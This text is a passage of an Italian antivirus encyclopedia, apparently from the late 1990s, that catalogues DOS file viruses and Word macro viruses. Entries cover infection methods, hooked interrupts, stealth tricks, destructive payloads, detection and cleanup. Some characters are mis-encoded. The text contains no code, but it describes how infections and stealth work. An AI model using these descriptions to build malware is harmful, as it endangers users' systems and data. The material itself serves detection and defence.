21h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia in memoria. Se "NO", si carica memoria. 3) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia in memoria. 2) Intercetta l'INT 21(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM non infetto e la sua lunghezza si trova tra 25 Byte e 63500 Byte, il virus procede alla sua infezione. Danni: Nessuno. Note: 1) Il virus rimane in memoria (MCB) (usa 6A pares). 2) I file infetti aumentano di 918 Byte. 3) Data ed ora dei file infetti non variano. [Warrier1] Nome del Virus: Warrier. Tipo di Virus: In memoria (Memoria alta), Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 300 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia in memoria. Se "NO", si carica in memoria. 3) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: Intercetta l'INT 21h (AX=4B00h) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM non infetto (tranne COMMAND.COM), il virus procede alla sua infezione. Danni: Nessuno. Note: 1) Il virus rimane in memoria alta (usa 61 Byte-pairs). 2) Data ed ora dei file infetti non variano. 3) Il cambiamento di lunghezza del file infetto varia in base a: i) Se il file originale non raggiunge i 768 Byte, la sua versione infetta Φ di 1.536 Byte di lunghezza. ii) Se il file originale supera i 768 Byte, la sua versione infetta aumenta di 768 Byte. Metodo di pulizia: Cancellare i primi 768 Byte dei file infetti. [Athens] Nome del Virus: Athens. Tipo di Virus: In memoria (Memoria alta), Virus da file. (File con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.463 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia giα in memoria. Se "NO", si carica in memoria alta. 3) Intercetta l'INT21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia in memoria. 2) Intercetta l'INT 21 (AH=4B00h) per infettare i file. Se il programma eseguito Φ un file con estensione *.COM o *.EXE non infetto (eccetto COMMAND.COM), il virus procede alla sua infezione. 3) Intercetta l'INT 21h (AX=4Eh, 4Fh, 11h, 12h) per controllare che il programma corrente sia infetto. Se "SI", il virus cambia la lunghezza del file e la data in DTA con la loro data originale. Questo evita che l'operatore si accorga del cambiamento di lunghezza e data dei file infetti, mentre il virus Φ in memoria. Danni: Nessuno. Note: 1) Il virus rimane in memoria alta (usa DFh pares). 2) I file infetti aumentano di 1.463 Byte. Non si rileva l'aumento mentre il virus Φ in memoria. 3) Data ed ora dei file infetti vengono cambiate. Non si rileva il cambiamento mentre il virus Φ in memoria. [Commy] Nome del Virus: Commy. Tipo di Virus: Virus da file (Infetta i file con estensione *.COM). Lunghezza del Virus: 998 Byte. Procedura eseguita: 1) Il virus si decodifica. 2) Controlla che il minuto corrente sia inferiore a 10 e che la versione di DOS corrente sia superiore alla 3.0. Se vengono soddisfatte queste condizioni, ricerca un file con estensione *.COM di lunghezza compresa tra 4.567Byte e 64.520 Byte e procede alla sua infezione (il virus infetta un file alla volta). 3) Ritorna alla funzione originale. Cerca i file nelle cartelle specificate dalla variabile PATH. Quando il virus infetta un file, codifica l'ora del file per verificare che sia stato infettato. Danni: Nessuno. Note: 1) I file infetti aumentano di 998 Byte. 2) La data dei file infetti non cambia. 3) L'ora dei file infetti cambia in seguito alla sua codifica. [Arriba] Nome del Virus: Arriba. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.590 Byte. Vettore PC agganciato: INT 21h, INT 08h. Procedura eseguita: 1) Controlla che sia in memoria. Se "SI", ritorna direttamente alla funzione originale. Altrimenti si porta in memoria alta. 2) Intercetta l'INT21h e controlla che la data corrente sia il giorno 20 novembre. Se "SI", intercetta l'INT 08h " e ritorna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 08h per mostrare un messaggio quindi blocca il sistema. 2) Intercetta l'INT 21h (AX=4B00) per controllare che il programma eseguito sia infetto. Se "NO", il virus lo infetta in diversi modi in base al tipo: se si tratta di un file con estensione *.COM, scrive il suo codice all'inizio del file originale, seguito dal codice del file; attacca quindi due Byte di identificazione del suo codice alla fine del file per verificare che questo file sia infetto; se si tratta di un file con estensione *.EXE, attacca il suo codice al termine di quello del file, cambia la testa del file ed attacca il codice di identificazione alla fine. Danni: Blocca il sistema quando viene selezionato l'INT 08h. Note: 1) Data ed ora dei file infetti rimangono invariate. 2) Il metodo che utilizza il virus per spostare il codice Φ particolare. Per prima cosa verifica che l'indirizzo A0000h sia scrivibile. Se "NO", sposta 1.000 Byte di quest'area ad un indirizzo pi∙ basso, ripetutamente, finchΦ trova un'area scrivibile. Si noteranno le modifiche nella memoria attraverso il programma MEM in quanto la lunghezza dei blocchi di memoria cambia. Questo metodo pu≥ danneggiare il codice del virus ed eventualmente bloccare il sistema. Metodo di rilevazione: I file infetti aumentano di 1.590 Byte. [Ekoterror] Nome del Virus: Ekoterror. Tipo di Virus: In memoria (Memoria alta), Virus da file, Virus che infetta la partizione da boot. Lunghezza del Virus: 2.048 Byte. Vettore PC agganciato: INT 08h, 13h, 21h. Procedura eseguita: 1) Quando viene eseguito un programma infetto, il virus scrive il suo codice virale alla Partizione. Non controlla che la Partizione sia giα stata infettata, cosicchΘ eseguendo un file infetto per diverse volte, vengono cancellati tutti i dati della Partizione. 2) Intercetta l'INT 08h, INT 13h, e seleziona l'INT 08h per controllare che il DOS sia stato caricato. Se "SI", intercetta l'INT 21h. Metodo di infezione: Intercetta l'INT 08h per controllare che il DOS sia stato caricato. Se "SI", intercetta l'INT 21h. Intercetta l'INT 13h per controllare che il settore caricato sia la Partizione. Se "SI", torna indietro o cambia i dati della Partizione. Intercetta l'INT 21h per infettare i file con estensione *.COM quando li legge o li scrive. Danni: Il virus cancella i dati nella Partizione dopo aver eseguito un file infetto per diverse volte. Note: 1) Se il virus ha invaso la Partizione, non si possono caricare o salvare i dati nell'hard disk se il sistema Φ avviato da un dischetto. Questo perchΘ i dati della Partizione sono cambiati. 2) Se la versione del DOS non Φ appropriata oppure il codice dell'INT 08h non Φ conforme al processo di caricamento del DOS, il virus pu≥ non intercettare l'INT 21. Questo ostacola il virus nell'infettare i file. Metodo di pulizia: Avvio da un dischetto non infetto. Utilizzo di un programma che pu≥ leggere o scrivere dati sull'hard disk (come Debug) per scrivere i dati della Partizione originale. (Il virus sposta i dati della Partizione originale alla testina 0, traccia 0, settore 5. Ogni volta che viene infettato, aggiunge 4 al numero dei settori). [AST-976] Nome del Virus: Ast-976. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 976 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia in memoria. Se "NO", si carica in memoria alta. 3) Intercetta l'INT 21h ed infetta tutti i file con estensione *.COM nella directory corrente (non infetta due volte lo stesso file). 4) Controlla che i minuti correnti siano 17. Se "SI", altera la Partizione per evitare che il sistema venga avviato correttamente. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia in memoria. 2) Intercetta l'INT 21 (AX=4B00h) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus procede alla sua infezione. Danni: Quando il virus Φ attivato, produce un flash sullo schermo. Cambia quindi i dati della Partizione. Il cambiamento avviene effettuendo un XOR con il numero 55 ogni 4 Byte del contenuto della tabella delle partizioni (su hard disk possono esserci fino a 4 partizioni diverse). Note: Data ed ora dei file infetti non variano. Metodo di rilevazione: I file infetti aumentano di 976 Byte. [AST-1010] Nome del Virus: Ast-1010. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.010 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Il virus decodifica. 2) Controlla che sia in memoria. Se "NO", si carica in memoria alta. 3) Intercetta l'INT21h ed infetta tutti i file con estensione *.COM ed *:EXE nella directory corrente (non infetta due volte lo stesso file). 4) Controlla che il giorno corrente sia 16. Se "SI", apporta delle modifiche alla Partizione per evitare che il sistema venga avviato correttamente. Metodo di infezione: 1) Intercetta l'INT 21h per controllare che sia in memoria. 2) Intercetta l'INT 21 (AX=4B00h) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE non infetto, il virus procede alla sua infezione. Danni: Quando il virus Φ attivato, produce un flash sullo schermo. Cambia quindi i dati della Partizione. Il cambiamento avviene effettuando un XOR con il valore esadecimale 55 ogni 4 Byte del contenuto della tabella delle partizioni (su hard disk possono esserci fino a 4 partizioni diverse). Note: 1) Data ed ora dei file infetti non variano. 2) Il metodo che il virus utilizza per controllare che sia in memoria Φ lo stesso del virus AST-976. In questo modo questi due virus possono trovarsi in memoria contemporaneamente. Metodo di rilevazione: I file infetti aumentano di 1.010 Byte. [Filler] Nome del Virus: Filler. Tipo di Virus: Virus da file. Procedura eseguita: Quando viene eseguito un file infetto, il virus scrive delle informazioni inutili in alcuni settori del floppy inserito in drive A. Danni: Distrugge alcuni settori del dischetto inserito in drive A (parte dal sito 0, traccia 28, settore 1, danneggia 8 settori). [Path] Nome del Virus: Path. Tipo di Virus: Virus da file (Infetta i file con estensione *.COM). Lunghezza del Virus: 3+906 Byte. Procedura eseguita: 1) Decodifica la sua seconda metα. 2) Controlla altri file infetti. Se Φ presente, infetta un solo programma. Altrimenti torna alla funzione originale. Va a cercare i file nelle cartelle specificate dalla variabile PATH. La condizione perchΘ venga infettato un file Φ che si tratti di un file con estensione *.COM non infetto di lunghezza compresa tra 10 e 64.000 Byte. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Data ed ora dei file infetti non variano. 3) I file infetti aumentano di 906+G Byte (0<=G<=247). [Flower] Nome del Virus: Flower. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 883 Byte. Procedura eseguita: 1) Decodifica la sua sezione in codice. 2) Controlla che la data corrente sia il giorno 11 novembre o che la versione del virus non sia inferiore a 174. Se viene soddisfatta una di queste condizioni, il virus distrugge il programma originale (Documenti) e ritorna alla funzione originale. Altrimenti, cerca il primo file non infetto nella directory corrente e procede alla sua infezione. Cerca il primo file non infetto nella subdirectory sotto la directory principale e procede alla sua infezione. 3) Ritorna alla funzione originale. Ciascun file infetto possiede il proprio numero. Quando infetta un file, il virus fa aumentare il numero corrente di 1. Questo numero viene mantenuto nel successivo processo di infezione. Danni: Quando il virus Φ attivo, allega una procedura a quella originale facendo comparire un messaggio. (Un poema inglese dal titolo "FLOWER"). Distrugge la procedura originale sovrascrivendola. Note: La data dei file infetti non varia; cambia invece l'ora, in seguito alla sua codifica. [Grunt-3] Nome del Virus: Grunt-3. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 3+473 Byte. Procedura eseguita: 1) Decodifica la sua seconda metα. 2) Controlla che vi sia un file con estensione *.COM od *.EXE non infetto nelle directory corrente e precedente. Se "SI", controlla che l'anno corrente non sia inferiore al 1993 e che sia venerd∞. Se "SI", non infetta ogni file ma fa comparire la stringa: "This is a hot LZ ...Eradicating the Enemy!". Altrimenti li infetta (infetta un solo file alla volta). Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Data ed ora dei file infetti non cambiano. Metodo di rilevazione: I file infetti aumentano di 473 Byte. [Ultrasik-1967] Nome del Virus: Ultrasik-1967. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.967 Byte. Procedura eseguita: Cerca un file con estensione *.EXE non infetto e procede alla sua infezione. Il cammino di ricerca inizia dalla cartella attuale, comprendendo le sue sotto cartelle, per continuare poi nella cartella principale ed in tutte le sottocartelle. DopodichΘ ritorna alla funzione originale. Se non c'Φ un file infettabile, blocca il sistema (lo scopo originale Φ formattare C. invece blocca il sistema per errate istruzioni nel codice virale). Danni: Nessuno. Note: Data ed ora dei file infetti non cambiano. Metodo di rilevazione: 1) I file infetti aumentano di lunghezza. 2) L'algoritmo Φ: Allunga il file per far diventare la sua lunghezza un multiplo di 16. Quindi la aumenta di 1.967 Byte. [Madden] Nome del Virus: Madden. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.988 Byte. Procedura eseguita: Cerca un file con estensione *.EXE non infetto e procede alla sua infezione. Il cammino di ricerca inizia dalla cartella attuale, comprendendo le sue sotto cartelle, per continuare poi nella cartella principale ed in tutte le sottocartelle. DopodichΘ ritorna alla funzione originale. Se non c'Φ un file infettabile, il virus emette uno strano suono che cessa solo al riavvio del computer. Danni: Nessuno. Note: Data ed ora dei file infetti non cambiano. Metodo di rilevazione: 1) I file infetti aumentano di lunghezza. 2) L'algoritmo Φ: Allunga il file per far diventare la sua lunghezza un multiplo di 16. Quindi la aumenta di 1.988 Byte. [Madden-B] Nome del Virus: Madden-B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.440 Byte. Procedura eseguita: Cerca un file con estensione *.EXE non infetto e procede alla sua infezione. Il cammino di ricerca inizia dalla cartella attuale, comprendendo le sue sotto cartelle, per continuare poi nella cartella principale ed in tutte le sottocartelle. DopodichΘ ritorna alla funzione originale. Se non c'Φ un file infettabile, il virus emette un suono da acuto a basso e viceversa che cessa solo al riavvio del computer. Danni: Nessuno. Note: Data ed ora dei file infetti non cambiano. Metodo di rilevazione: 1) I file infetti aumentano di lunghezza. 2) L'algoritmo Φ: Allunga il file per far diventare la sua lunghezza un multiplo di 16. Quindi la aumenta di 1.440 Byte. [Prime] Nome del Virus: Prime. Tipo di Virus: Virus da file. (*.C*; soprattutto *.COM). Lunghezza del Virus: 580 Byte. Vettore PC agganciato: INT 01h, INT 03h, INT 24h. Procedura eseguita: 1) Decodifica la sua seconda metα. 3) Controlla che il giorno corrente sia 1. Se "SI", compare un messaggio e lo schermo ruota una volta da sinistra a destra. Indipendentemente da che giorno sia, cerca un file non infetto nella directory corrente e procede alla sua infezione. 3) Quindi termina. Metodo di infezione: 1) Ottiene i codici originali e li codifica con F3h. 2) Ottiene l'ora di sistema e la sostituisce con la seconda metα del codice del virus. 3) Aggiunge il codice del virus al file originale, seguito dai codici originali. Intercetta l'INT 01h, l'INT 03h per evitare il programma Debug. Quando viene eseguito questo programma, salta a FE05Bh per ricaricare il sistema. Intercetta l'INT 24h per aggirare la protezione da scrittura nel dischetto corrente. Quando viene selezionato l'INT 24h, si blocca il sistema a causa del codice del virus. Danni: Per prevenire l'esecuzione di programmi dopo che il virus Φ in esecuzione, i programmi originali vengono codificati. Note: 1) Non rimane in memoria. 2) Il virus blocca il sistema quando rileva un file con estensione *.C* non infettabile nella directory corrente. 3) Data ed ora dei file infetti non cambiano. Metodo di rilevazione: I file infetti aumentano di 580 Byte. Metodo di pulizia: Cancellare i primi 580 Byte dei file infetti. I rimanenti Byte saranno eseguiti in XOR con il valore esadecimale F3h, uno per uno. [PSV-354] Nome del Virus: Psv-354. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 354 Byte. Procedura eseguita: 1) Decodifica la sua seconda metα. 2) Cerca un file con estensione *.COM non infetto di lunghezza compresa tra 150 e 65.000 Byte. Se c'Φ o ci sono, ne infetta uno solo. Altrimenti, ritorna alla funzione originale.. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Data ed ora dei file infetti non cambiano. 3) Non infetta COMMAND.COM di DOS 5.0. Metodo di rilevazione: I file infetti aumentano di 354 Byte. [PCBB] Nome del Virus: Pcbb. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 3+(1.675-1.687) Byte. Vettore PC agganciato: INT 09h, INT 1Ch, INT 21h. Procedura eseguita: 1) Decodifica la sua seconda metα. 2) Controlla che sia in memoria. Se "NO", si carica in memoria alta. 3) Intercetta l'INT 21h, l'INT 09h, l'INT 1Ch e ritorna alla funzione originale. Metodo di infezione: L'infezione si verifica quando si esegue un programma, si copia un file, si cambia l'attributo del file, si apre un file, si chiude un file o si rinomina un file (AH=56h). Quando infetta un file, il virus controlla innanzitutto il giorno della settimana e seleziona la codifica corrispondente per quel giorno. Vi sono 7 possibili codifiche. Il virus non infetta lo stesso file, infetta solo file di lunghezza compresa tra 16 e 61.440Byte. Sintomi: Mentre viene attivato il virus, lo schermo diventa bianco, quando la somma dei tasti premuti equivale a 957. In seguito, il virus regola il contatore e ricomincia da capo. Si possono premere Alt, Control, Shift sinistro e destro contemporaneamente per far tornare lo schermo alle condizioni normali. Danni: Nessuno. Note: Rimane in memoria ed utilizza 4K Byte. Metodo di rilevazione: 1) Data ed ora dei file infetti cambiano. 2) I file infetti aumentano di 1.675, 1.677, 1.679, 1.679, 1.680, 1.683, o 1.687 Byte a seconda del giorno di infezione (rispettivamente da domenica a sabato). 3) PCBB si attacca alla fine dei file infetti. [Comspec] Nome del Virus: Comspec. Tipo di Virus: Virus da file. Lunghezza del Virus: 3.424 Byte. Procedura eseguita: 1) Esegue COMMAND.COM per creare 6 file copie del virus usando 6 nomi di file della directory C:\DOS. Queste copie vengono salvate nella directory corrente. Se non c'Φ la directory C:\DOS, crea un file chiamato "COMSPEC." Danni: Sovrascrive 6 file se viene eseguito nella directory C:\DOS. Metodo di rilevazione: La lunghezza dei file infetti Φ 3.424. [T-1000] Nome del Virus: T-1000. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 128 Byte. Procedura eseguita: 1) Decodifica la sua seconda metα 2) Infetta tutti i file con estensione *.COM nella directory corrente. Metodo di infezione: 1) Acquisisce l'ora di sistema e la codifica con la procedura originale. 2) Sovrascrive i suoi primi 128 Byte con il codice del virus. Se Φ di lunghezza inferiore a 128 Byte, diventa di 128 Byte dopo che Φ stato infettato. Altrimenti la lunghezza non cambia. Danni: Sovrascrive i primi 127 Byte del file originale con il codice del virus, di conseguenza rende il file inutilizzabile. Metodo di rilevazione: Data ed ora dei file infetti sono cambiate. [Seneca] Nome del Virus: Seneca. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 392 Byte. Procedura eseguita: Il virus acquisisce data ed ora del sistema; infetta il sistema in base alle seguenti condizioni: (1)L'anno corrente non deve essere superiore al 1980 ed il minuto corrente non inferiore a 30, oppure l'anno corrente maggiore del 1980 ed il giorno corrente non il 25 novembre: Infetta tutti i file con estensione *.EXE nella directory corrente e in tutte directory padre. (2) L'anno corrente non deve essere superiore al 1980 ed il minuto corrente non inferiore a 30: Compare il messaggio: "You shouldn't use your computer so much, it's bad for you and your computer." Rende quindi inutilizzabile il dischetto in uso. (3) L'anno corrente maggiore del 1980 ed il giorno corrente il 25 novembre: Compare il messaggio: "HEY EVERYONE!!!" "Its Seneca's B-Day ! Let's Party!" Rende quindi inutilizzabile il dischetto in uso. Il metodo di distruzione del dischetto in (2) e (3) Φ il seguente: Scrive dei dati sui primi 255 settori del dischetto, cancellandovi dei dati importanti. Danni: Nella condizione (1), i file infetti vengono distrutti perchΘ sono sovrascritti i loro primi 392 Byte. Nelle condizioni (2) e (3), sono sovrascritti i primi 255 settori del dischetto. Note: Data ed ora dei file infetti non cambiano. Metodo di rilevazione: Uno dei suddetti messaggi appare sullo schermo. [Word_Baby.A] Nome del Virus: Word.Baby.A. Tipo di Virus: Virus da Macro di Word. Pseudonimo: Punten. Piattaforma: Word 6/7. Numero delle macro: 10. Criptato: Si. Lunghezza delle macro: 4.322 Byte. Luogo d'origine: Sconosciuto. Data d'origine: Primavera 1997. Payload: Si. Data d'avvio: 24 marzo, 15 ottobre, 1, 30, 21 settembre. Password: Nessuna. Rilevato In The Wild: No. Luogo di rilevazione: Regno Unito. DESCRIZIONE: Word.Baby.A infetta la modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti e salvati (Fiele\Salva e Fiele\Salva con nome). Baby.A usa Tools\Macro e ToolsCustomize per rendere pi∙ difficile il riconoscimento di un file infetto (chiamata tecnica macro stealth). Quando si seleziona ToolMacro/ToolsCustomize, compare il messaggio: " 57773LKOM ! " I seguenti messaggi compaiono quando si esce da Microsoft Word: Il 24 marzo: " Stop Work Let's Party, this is my Day ! " Il giorno 1 del mese dopo le ore 15: " 57773LK0M ! " Il 15 ottobre: "GiE, You're gettin' Old, Bro !" Il 21 settembre: " Cathy, this is your day. Have Fun ! " Quando viene stampato un documento il giorno 30 di ogni mese, Baby.A inserisce nel documento attivo il seguente messaggio: " Punten ... " " I Just Wanna Give a Shut Up to @Rapi.Kom: " " Just Don't Make Any Distruttivo Virus Ok ! " " Insert "We're East-Man Remember ! " " Insert "Peace 2 all My Home-Bro' Out There ! " " Insert "I'm Outta here !! Mangga sadayana... " [Word_Balu.A] Nome del Virus: Word.Balu.A. Tipo di Virus: Virus da Macro di Word . Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 2 o 1. Criptato: Si. Lunghezza delle macro: 776 o 646 Byte. Luogo d'origine: Germania. Data d'origine: Primavera 1997. Payload: Si. Data d'attivazione: l 5 aprile, 16 aprile. Password: SSichliebeDich, SSICHLIEBEDICH. Rilevato In The Wild: No. DESCRIZIONE: Word.Balu non infetta altri documenti. Viene classificato come un cavallo di troia. Balu lavora solo con la versione tedesca di Microsoft Word, dato che usa il linguaggio specifico delle macro. Il giorno 5 aprile, Balu rinomina i seguenti file: " c:\command.com" to "c:\kniffel\com.com " " c:\msdos.sys" to "c:\kniffel\ms.sys " " c:\io.sys" to "c:\kniffel\ii.sys " La seconda procedura di Balu aggiunge la seguente password per salvare i documenti: " SSichliebeDich " " SSICHLIEBEDICH " Il giorno16 aprile, Balu fa comparire il seguente messaggio: " Dicke aus Schwelm, ich werde Dich immer lieben, weil die Tⁿr " zu meinem Herzen immer fⁿr Dich offen steht, egal was passiert. " " Ich hoffe Du verzeihst mir. " " Dein balu aus Schwelm " [Word_Barbaro.A:It] Nome del Virus: Word.Barbaro.A:It. Tipo di Virus: Virus da Macro di Word. Pseudonimo: Nostradamus. Piattaforma: Word 6/7. Numero di macro: 3. Criptato: No. Lunghezza delle macro: 2.813 Byte. Luogo d'origine: Italia. Data d'origine: Dicembre 1996. Payload: Si. Data d'attivazione: 31. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Barbaro infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono salvati (File\Salva). Word.Barbaro A usa Tools\Macro per rendere pi∙ difficile il riconoscimento di un file infetto (chiamata tecnica macro stealth). Il giorno 31 di ogni mese, Barbaro fa comparire il messaggio: "Barbaro impero dal terzo sarai soggiogato " "Gran parte d'individui della sua origine farα perire " "Per decesso senile avverrα la sua fine, il quarto colpirα " "Per timore che il sangue con il sangue morte ne derivi. " " NOSTRADAMUS Virus " Word.Barbaro lavora solo con la versione italiana di Microsoft Word, dato che usa il linguaggio specifico delle macro. [Word_ABC.A] Nome del Virus: Word.ABC.A. Virus type: : Virus da Macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 3. Criptato: Si. Lunghezza delle macro: 1.836 (1.801) Byte. Luogo d'origine: USA. Data d'origine: Autunno 1996. Distruttivo: No. Data d'attivazione: Nessuno. Password: Nessuno. Rilevato In The Wild: No. DESCRIZIONE: Word.ABC.A infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono salvati (File\Salva con nome). Word.ABC.A Φ uno dei pochi virus da macro non distruttivi. Infetta altri file e compare il messaggio: " I am happy; are you too? " Quando viene attivata la macro "Colin", aggiunge il seguente testo alla sezione File\Proprietα dei documenti infetti: " Smash Technology " " Resist Oppression " [Word-CeeFour.A] Nome del Virus: Word.Ceefour.A. Tipo di Virus: Virus da Macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 6. Criptato: Si. Lunghezza delle macro: 4.062 Byte. Luogo d'origine: USA. Data d'origine: Primavera 1997. Distruttivo: Si. Data d'attivazione: 1 aprile. Password: Nessuno. Rilevato In The Wild: No. DESCRIZIONE: Word.CeeFour.A infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono salvati Word.CeeFour.A usa StrumentiMacro e FileTemplates per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Quando si seleziona una delle due opzioni, CeeFour.A fa comparire il messaggio: " A serious error has occoured in sub program: MenuBar " Quando viene salvato un documento il giorno 1 aprile, CeeFour.A Φ attivato e fa quanto segue: 1. Etichetta la partizione del primo Hard disk con " C4_BY_KARL ". 2. Cancella tutti i file in C:\. 3. Cancella C:\COMMAND.COM. 4. Cancella C:\WINDOWS\WIN.COM. Nella macro CEEFOUR si pu≥ ritrovare il seguente messaggio: " C-4 By Karl " " You are about to have a very bad day. " " It looks like C4 in the mothers arm. " " We are both professional, This is personal. " " And when Alexander saw the bredth of his domain he wept for there " " were no more worlds to conquer (benefits of a classical education)" " quotes from the masters! " [Word_CeeFour.B] Nome del Virus: Word.Ceefour.B. Tipo di Virus: Virus da Macro di Word . Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 6. Criptato: Si. Lunghezza delle macro: 4.019 Byte. Luogo d'origine: Regno Unito. Data d'origine: Febbraio 1997. Distruttivo: Si. Data d'attivazione: 1 aprile. Password: Nessuno. Rilevato In The Wild: Si. Luogo di rilevazione: Regno Unito DESCRIZIONE: La pi∙ grande differenza tra questa nuova versione ed i precedenti virus CeeFour.A Φ che il codice Φ stato leggermente modificato. Per ulteriori informazioni, fare riferimento a quanto scritto per il virus CeeFour.A. [Word_Chaka.A] Nome del Virus: Word.Chaka.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 1 o 3. Criptato: No. Lunghezza delle macro: 741 (845 o 843) Byte. Luogo d'origine: Germania. Data d'origine: Estate 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Chaka.A infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (File\Apri - DateiOeffnen nella versione tedesca di Microsoft Word) o chiusi (Doc\Chiudi- DateiSchliessen nella versione tedesca di Microsoft Word). [Word_Chandigarh.A] Nome del Virus: Word.Chandigarh.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 1. Criptato: Si. Lunghezza delle macro: 244 Byte. Luogo d'origine: India. Data d'origine: maggio 1996. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Chandigarh.A infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). Il seguente commento pu≥ essere trovato nel codice di Chandigarh: " This Code was written in Chandigarh (India) on 01.05.1996 " [Word_Cheat.A] Nome del Virus: Word.Cheat.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 1. Criptato: No. Lunghezza delle macro: 249 Byte. Luogo d'origine: Sconosciuto. Data d'origine: Estate 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Cheat.A Φ un altro virus da macro. A causa di errori di programmazione del codice, non infetta altri file. [Word.Cheat.B] Nome del Virus: Word.Cheat.B. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 1. Criptato: No. Misura delle macro: 279 Byte. Luogo d'origine: Sconosciuto. Data d'origine: Estate 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Cheat.A Φ un altro virus da macro. Per un bug di programmazione del codice, non infetta altri file. [Word_Vicis.A] Nome del Virus: Word.Vicis.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Vicissitator. Piattaforma: Word 6/7. Numero di macro: 1 o 2 (modello principale). Criptato: No. Misura delle macro: Varie. Luogo d'origine: Sconosciuto. Data d'origine: Luglio 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Vicis.A infetta il modello principale quando Φ salvato un documento infetto. Altri documenti diverranno infetti quamdo vengono salvati (File\Salva). Word.Vicis.A Φ un altro virus polimorfo che si modifica. Ogni volta che un utente salva un documento, mentre il modello principale (normal.dot) Φ infetto, Word.Vicis.A chiama il suo codice mutante. Per un bug alcune varianti non riescono ad infettare altri file. Eseguendo la macro alterata File\Salva, il virus fa si che Microsoft Word faccia apparire un messaggio d'errore. Mentre un antivirus che utilizza le firme non dovrebbe avere problemi nel rilevare Vicis.A, una ricerca basata su CRC fallisce. Word.Vicis.A usa Tools\Macro per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Il seguente commento pu≥ essere trovato nella macro di Tools\Macro: " You have been Infected by the Vicissitator Macro Virus. " " (C)1997 CyberYoda A Member of the SLAM Virus Team " Word.Vicis.A fu distribuito nel luglio 1997 su una rivista che tratta di virus. [Word_Black.A] Nome del Virus: Word.Black.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: BlackDeath. Piattaforma: Word 6/7. Numero di macro: 3. Criptato: Si. Misura delle macro: 1.355 Byte. Luogo d'origine: USA. Data d'origine: Giugno1997. Distruttivo: Si. Data d'attivazione: Venerd∞ 13. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Black infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). Il seguente commento pu≥ essere trovato nella macro AutoExec: " REM Fuck Micro$oft! " Venerd∞ 13 Black fa apparire il seguente messaggio: " Your computer is now lost to the ages... " " 